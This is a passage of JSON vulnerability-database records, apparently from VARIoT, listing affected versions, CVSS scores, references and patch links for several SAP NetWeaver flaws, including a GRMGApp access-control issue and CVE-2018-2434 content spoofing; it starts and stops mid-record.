"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2012-1291"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://secunia.com/advisories/47861/"
},
{
"trust": 2.0,
"url": "http://dsecrg.com/pages/vul/show.php?id=415"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/47861"
},
{
"trust": 1.6,
"url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/52101"
},
{
"trust": 1.6,
"url": "https://service.sap.com/sap/support/notes/1585527"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1291"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-1291"
},
{
"trust": 0.4,
"url": "http://dsecrg.com/pages/vul/show.php?id=413"
},
{
"trust": 0.4,
"url": "http://dsecrg.com/pages/vul/show.php?id=414"
},
{
"trust": 0.4,
"url": "http://dsecrg.com/pages/vul/show.php?id=416"
},
{
"trust": 0.4,
"url": "http://dsecrg.com/pages/vul/show.php?id=412"
},
{
"trust": 0.3,
"url": "http://www.sap.com/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_intelligence/"
},
{
"trust": 0.1,
"url": "http://www.rsaconference.com/events/2012/usa/index.htm"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=47861"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/47861/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-0825"
},
{
"db": "CNVD",
"id": "CNVD-2012-0822"
},
{
"db": "CNVD",
"id": "CNVD-2012-0826"
},
{
"db": "CNVD",
"id": "CNVD-2012-0827"
},
{
"db": "CNVD",
"id": "CNVD-2012-0823"
},
{
"db": "BID",
"id": "52101"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001571"
},
{
"db": "PACKETSTORM",
"id": "110028"
},
{
"db": "NVD",
"id": "CVE-2012-1291"
},
{
"db": "CNNVD",
"id": "CNNVD-201202-445"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2012-0825"
},
{
"db": "CNVD",
"id": "CNVD-2012-0822"
},
{
"db": "CNVD",
"id": "CNVD-2012-0826"
},
{
"db": "CNVD",
"id": "CNVD-2012-0827"
},
{
"db": "CNVD",
"id": "CNVD-2012-0823"
},
{
"db": "BID",
"id": "52101"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001571"
},
{
"db": "PACKETSTORM",
"id": "110028"
},
{
"db": "NVD",
"id": "CVE-2012-1291"
},
{
"db": "CNNVD",
"id": "CNNVD-201202-445"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-02-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-0825"
},
{
"date": "2012-02-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-0822"
},
{
"date": "2012-02-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-0826"
},
{
"date": "2012-02-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-0827"
},
{
"date": "2012-02-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-0823"
},
{
"date": "2012-02-21T00:00:00",
"db": "BID",
"id": "52101"
},
{
"date": "2012-02-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-001571"
},
{
"date": "2012-02-21T06:09:48",
"db": "PACKETSTORM",
"id": "110028"
},
{
"date": "2012-02-23T20:07:25.957000",
"db": "NVD",
"id": "CVE-2012-1291"
},
{
"date": "2012-02-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201202-445"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-02-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-0825"
},
{
"date": "2012-02-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-0822"
},
{
"date": "2012-02-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-0826"
},
{
"date": "2012-02-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-0827"
},
{
"date": "2012-02-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-0823"
},
{
"date": "2012-02-27T20:40:00",
"db": "BID",
"id": "52101"
},
{
"date": "2012-02-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-001571"
},
{
"date": "2012-02-24T05:00:00",
"db": "NVD",
"id": "CVE-2012-1291"
},
{
"date": "2012-02-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201202-445"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201202-445"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver In Adapter Monitor Vulnerability to get important information about",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-001571"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "lack of information",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201202-445"
}
],
"trust": 0.6
}
}
var-201302-0416
Vulnerability from variot
There is a security vulnerability in SAP NetWeaver, and the application does not properly restrict access to GRMGApp, allowing an attacker to exploit the vulnerability to send administrative commands to the gateway or message server. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. There is a security vulnerability in SAP NetWeaver. There is an unspecified error in GRMGApp when parsing external XML entities, allowing an attacker to exploit the vulnerability to read local file content
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201302-0416",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.x"
}
],
"sources": [
{
"db": "IVD",
"id": "cf3db9e4-1f34-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "ccc04506-1f34-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-01257"
},
{
"db": "CNVD",
"id": "CNVD-2013-01259"
}
]
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "cf3db9e4-1f34-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
},
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "ccc04506-1f34-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
}
],
"cvssV3": [],
"severity": [
{
"author": "IVD",
"id": "cf3db9e4-1f34-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "ccc04506-1f34-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "cf3db9e4-1f34-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "ccc04506-1f34-11e6-abef-000c29c66e3d"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "There is a security vulnerability in SAP NetWeaver, and the application does not properly restrict access to GRMGApp, allowing an attacker to exploit the vulnerability to send administrative commands to the gateway or message server. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. There is a security vulnerability in SAP NetWeaver. There is an unspecified error in GRMGApp when parsing external XML entities, allowing an attacker to exploit the vulnerability to read local file content",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-01257"
},
{
"db": "CNVD",
"id": "CNVD-2013-01259"
},
{
"db": "IVD",
"id": "cf3db9e4-1f34-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "ccc04506-1f34-11e6-abef-000c29c66e3d"
}
],
"trust": 1.44
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "SECUNIA",
"id": "52272",
"trust": 1.2
},
{
"db": "CNVD",
"id": "CNVD-2013-01257",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2013-01259",
"trust": 0.8
},
{
"db": "IVD",
"id": "CF3DB9E4-1F34-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "IVD",
"id": "CCC04506-1F34-11E6-ABEF-000C29C66E3D",
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "cf3db9e4-1f34-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "ccc04506-1f34-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-01257"
},
{
"db": "CNVD",
"id": "CNVD-2013-01259"
}
]
},
"id": "VAR-201302-0416",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "cf3db9e4-1f34-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "ccc04506-1f34-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-01257"
},
{
"db": "CNVD",
"id": "CNVD-2013-01259"
}
],
"trust": 1.8691792200000001
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 1.6
}
],
"sources": [
{
"db": "IVD",
"id": "cf3db9e4-1f34-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "ccc04506-1f34-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-01257"
},
{
"db": "CNVD",
"id": "CNVD-2013-01259"
}
]
},
"last_update_date": "2022-05-17T01:43:25.801000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP NetWeaver GRMGApp security bypass vulnerability patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/32164"
},
{
"title": "Patch for SAP NetWeaver GRMGApp XML File Parsing Error Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/32165"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-01257"
},
{
"db": "CNVD",
"id": "CNVD-2013-01259"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.2,
"url": "http://secunia.com/advisories/52272/http"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-01257"
},
{
"db": "CNVD",
"id": "CNVD-2013-01259"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "cf3db9e4-1f34-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "ccc04506-1f34-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-01257"
},
{
"db": "CNVD",
"id": "CNVD-2013-01259"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-02-25T00:00:00",
"db": "IVD",
"id": "cf3db9e4-1f34-11e6-abef-000c29c66e3d"
},
{
"date": "2013-02-25T00:00:00",
"db": "IVD",
"id": "ccc04506-1f34-11e6-abef-000c29c66e3d"
},
{
"date": "2013-02-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-01257"
},
{
"date": "2013-02-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-01259"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-02-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-01257"
},
{
"date": "2013-05-24T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-01259"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver GRMGApp Security Bypass Vulnerability",
"sources": [
{
"db": "IVD",
"id": "cf3db9e4-1f34-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-01257"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Access verification error",
"sources": [
{
"db": "IVD",
"id": "cf3db9e4-1f34-11e6-abef-000c29c66e3d"
}
],
"trust": 0.2
}
}
var-201807-1586
Vulnerability from variot
A content spoofing vulnerability in the following components allows to render html pages containing arbitrary plain text content, which might fool an end user: UI add-on for SAP NetWeaver (UI_Infra, 1.0), SAP UI Implementation for Decoupled Innovations (UI_700, 2.0): SAP NetWeaver 7.00 Implementation, SAP User Interface Technology (SAP_UI 7.4, 7.5, 7.51, 7.52). There is little impact as it is not possible to embed active contents such as JavaScript or hyperlinks. plural SAP The product contains an input validation vulnerability.Information may be tampered with. SAP User Interface Technology is prone to an unspecified content-spoofing vulnerability. Attackers can exploit this issue to manipulate and spoof content, which may aid in further attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201807-1586",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.9,
"vendor": "sap",
"version": "7.0"
},
{
"model": "user interface technology",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.4"
},
{
"model": "user interface technology",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.51"
},
{
"model": "user interface technology",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.5"
},
{
"model": "ui infra",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "1.0"
},
{
"model": "user interface technology",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.52"
},
{
"model": "netweaver",
"scope": null,
"trust": 0.8,
"vendor": "sap",
"version": null
},
{
"model": "user interface technology",
"scope": null,
"trust": 0.8,
"vendor": "sap",
"version": null
},
{
"model": "ui infra",
"scope": null,
"trust": 0.8,
"vendor": "sap",
"version": null
},
{
"model": "ui",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.52"
},
{
"model": "ui",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.51"
},
{
"model": "ui",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.5"
},
{
"model": "ui",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.4"
}
],
"sources": [
{
"db": "BID",
"id": "105088"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-008005"
},
{
"db": "NVD",
"id": "CVE-2018-2434"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-921"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:ui_infra:1.0:*:*:*:*:netweaver:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:user_interface_technology:7.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:user_interface_technology:7.51:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:user_interface_technology:7.52:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:user_interface_technology:7.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-2434"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "105088"
}
],
"trust": 0.3
},
"cve": "CVE-2018-2434",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2018-2434",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.8,
"impactScore": 1.4,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2018-2434",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-2434",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201807-921",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-008005"
},
{
"db": "NVD",
"id": "CVE-2018-2434"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-921"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A content spoofing vulnerability in the following components allows to render html pages containing arbitrary plain text content, which might fool an end user: UI add-on for SAP NetWeaver (UI_Infra, 1.0), SAP UI Implementation for Decoupled Innovations (UI_700, 2.0): SAP NetWeaver 7.00 Implementation, SAP User Interface Technology (SAP_UI 7.4, 7.5, 7.51, 7.52). There is little impact as it is not possible to embed active contents such as JavaScript or hyperlinks. plural SAP The product contains an input validation vulnerability.Information may be tampered with. SAP User Interface Technology is prone to an unspecified content-spoofing vulnerability. \nAttackers can exploit this issue to manipulate and spoof content, which may aid in further attacks",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-2434"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-008005"
},
{
"db": "BID",
"id": "105088"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-2434",
"trust": 2.7
},
{
"db": "BID",
"id": "105088",
"trust": 1.9
},
{
"db": "JVNDB",
"id": "JVNDB-2018-008005",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201807-921",
"trust": 0.6
}
],
"sources": [
{
"db": "BID",
"id": "105088"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-008005"
},
{
"db": "NVD",
"id": "CVE-2018-2434"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-921"
}
]
},
"id": "VAR-201807-1586",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:52:34.392000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Patch Day - July 2018",
"trust": 0.8,
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=497256000"
},
{
"title": "Multiple SAP Product security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=84030"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-008005"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-921"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-345",
"trust": 1.0
},
{
"problemtype": "CWE-20",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-008005"
},
{
